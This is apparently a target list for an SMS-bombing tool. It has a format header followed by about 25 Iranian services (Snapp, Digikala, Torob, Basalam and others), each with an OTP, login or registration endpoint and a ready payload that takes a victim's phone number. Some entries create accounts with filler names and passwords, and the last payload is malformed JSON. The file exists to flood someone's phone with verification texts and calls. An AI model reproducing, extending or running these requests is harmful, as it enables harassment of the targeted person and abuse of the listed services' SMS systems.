﻿//Format:
//Empty Line
//Name (optional)
//URL (URL)
//RequestType (GET or POST or nonexistant (defaults to POST)
//Payload (with a {PN} to be replaced with the phone number without 0 or countrycode) (POST ONLY)
//AddToUrl (with a {PN}) (can be nonexistant at all)
//Interval (in miliseconds) (nonexistant for 10000ms)
//Headers (or just Nonexistant) (Can have multiple of these, each headar key/value pair must be in a single line, repeated header keys are overwritten) *optional
//OKResponseStatusCodeMatch (Nonexistant for 200) *optional
//OKResponseTextMatch (Nonexistant with no quotes or whatever) *optional
//FailResponseStatusCodeMatch (Nonexistant for anything other than 200) *optional
//FailResponseTextMatch (Nonexistant) *optional
//ContentType (Nonexistant for application/json) *optional
//ForceAcceptCustomHTTPResp (true or false/Nonexistant) *optional
//Proxy (Optional) !! NOT IMPLEMENTED YET !!
//END or one empty line

Name Snapp
URL https://app.snapp.taxi/api/api-passenger-oauth/v2/otp
Payload {"cellphone": "0{PN}"}

Name Lendo
URL https://api.lendo.ir/api/customer/auth/send-otp
Payload {"mobile": "0{PN}"}

Name Buskool
URL https://www.buskool.com/send_verification_code
Payload {"phone": "0{PN}"}

Name Torob
URL https://api.torob.com/v4/user/phone/send-pin
Payload {"phone_number": "0{PN}"}

Name DrDr
URL https://drdr.ir/api/registerEnrollment/verifyMobile
Payload {"phoneNumber": "0{PN}"}

Name Itool
URL https://app.itoll.ir/api/v1/auth/login
Payload {"mobile": "0{PN}"}

Name Telewebion
URL https://gateway.telewebion.com/shenaseh/api/v2/auth/step-one
Payload {"code": "98", "phone": {PN}, "smsStatus": "default"}

Name Gap
URL https://core.gap.im/v1/user/add.json
Payload {"mobile": "+98{PN}"}

Name Caropex
URL https://caropex.com/api/v1/user/login
Payload {"mobile": "0{PN}"}

Name HamrahSport
URL https://hamrahsport.com/send-otp
Payload {"cell": {PN}, "name": "persian_string", "agree": "1", "send_otp": "1", "otp": ""}

Name harikashop 
URL https://harikashop.com/login?back=my-account
Payload {"username": "0{PN}", "id_customer": "", "back": [ "", "https://harikashop.com/login?back=my-account" ], "firstname": "persian_string", "lastname": "persian_string", "password": "random_password", "action": "register", "ajax": "1"}

Name Novinmedical
URL https://novinmedical.com/wp-admin/admin-ajax.php
Payload action=stm_login_register&type=mobile&input=0{PN}
ContentType application/x-www-form-urlencoded

Name zzzagros
URL https://www.zzzagros.com/wp-admin/admin-ajax.php
Payload {"action": "ywp_ajax_register", "ywp_register": "1", "ywp_reg_mobile": "0{PN}", "ywp_reg_password": "random_password", "ajax_woocommerce_register_nonce": ""}

Name Basalam
URL https://auth.basalam.com/otp-request
Payload {"mobile": "0{PN}"}

Name Arastag
URL https://arastag.ir/wp-admin/admin-ajax.php
Payload {"action": "verify_user_login", "user": "0{PN}", "captcha": "" }

Name Tamimpishro
URL https://www.tamimpishro.com/site/api/v1/user/otp
Payload {"mobile": "0{PN}"}

Name Fafait
URL https://api2.fafait.net/oauth/check-user
Payload {"id": "0{PN}"}

Name Fankala
URL https://fankala.com/wp-admin/admin-ajax.php
Payload {"action": "verify_user_login", "user": "0{PN}", "captcha": ""}

Name khanoumi
URL https://www.khanoumi.com/accounts/sendotp
Payload {"mobile": "0{PN}", "redirectUrl": ""}

Name Dalfak
URL https://www.dalfak.com/api/auth/sendVerificationCode
Payload {"type": 1, "value": "0{PN}"}

Name FilmNet
URL https://filmnet.ir/api-v2/access-token/users
AddToUrl /0{PN}/otp
RequestType GET

Name SnappApps
URL https://api.snapp.ir/api/v1/sms/link
Payload {"phone": "0{PN}"}

Name DoctoreTo
URL https://api.doctoreto.com/api/web/patient/v1/accounts/register
Payload {"country_id": 205, "mobile": {PN}}

Name DigiKalaCall
URL https://api.digikala.com/v1/user/authenticate/
Payload {"backUrl": "/","username": "0{PN}", "otp_call": "true"}

Name Okala
URL https://api-react.okala.com/C/CustomerAccount/OTPRegister
Payload {"mobile": "0{PN}", "deviceTypeCode": 0, "confirmTerms": "true", "notRobot": "false"}

Name DigiKala
URL https://api.digikala.com/v1/user/authenticate/
Payload {"backUrl": "/", "username": "0{PN}", {"otp_call": "false"}}